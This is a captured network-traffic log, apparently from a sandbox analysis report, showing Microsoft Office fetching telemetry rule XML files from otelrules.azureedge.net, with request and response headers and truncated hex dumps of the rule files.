                                                  2024-10-31 19:50:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  111192.168.2.45242413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:53 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:53 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:53 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BDFD43C07"
                                                  x-ms-request-id: 3bd815fc-c01e-0066-6070-26a1ec000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195053Z-16849878b78sx229w7g7at4nkg000000085000000000tnr5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:53 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  112192.168.2.45242513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:53 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:53 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:53 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDD74D2EC"
                                                  x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195053Z-16849878b78km6fmmkbenhx76n00000009d0000000004u18
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:53 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  113192.168.2.45242613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:53 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:53 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:53 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1427
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                  ETag: "0x8DC582BE56F6873"
                                                  x-ms-request-id: 030836bc-301e-003f-7e5c-2a266f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195053Z-159b85dff8fprglthC1DFW8zcg0000000200000000003m71
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:53 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  114192.168.2.45242713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:53 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:53 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:53 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1390
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                  ETag: "0x8DC582BE3002601"
                                                  x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195053Z-15b8d89586fmhkw429ba5n22m80000000bfg00000000c9nh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:53 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  115192.168.2.45242813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:53 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:53 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1401
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                  ETag: "0x8DC582BE2A9D541"
                                                  x-ms-request-id: 07565181-a01e-001e-6ec9-2a49ef000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195053Z-159b85dff8fgxq4qhC1DFWxa0n000000028g000000008r6k
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  116192.168.2.45242913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:53 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1364
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB6AD293"
                                                  x-ms-request-id: ea4f12d2-001e-0066-30b1-2a561e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195054Z-159b85dff8f9g9g4hC1DFW9n70000000022g00000000a6zp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  117192.168.2.45243113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:54 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1354
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE0662D7C"
                                                  x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195054Z-16849878b78wc6ln1zsrz6q9w800000009ng00000000hur4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  118192.168.2.45243013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:54 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1391
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF58DC7E"
                                                  x-ms-request-id: 92eac08a-601e-0001-29b2-26faeb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195054Z-16849878b78p8hrf1se7fucxk80000000awg00000000apw5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  119192.168.2.45243213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:54 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                  ETag: "0x8DC582BDCDD6400"
                                                  x-ms-request-id: a1e8ab16-701e-0050-601c-266767000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195054Z-16849878b78x6gn56mgecg60qc0000000bsg00000000kz2e
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  120192.168.2.45243313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:54 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:54 UTC538INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:54 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                  ETag: "0x8DC582BDF1E2608"
                                                  x-ms-request-id: 548bc1da-901e-0067-71ad-29b5cb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195054Z-159b85dff8f7x84jhC1DFWaghs00000001u000000000b1hv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  121192.168.2.45243413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:54 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
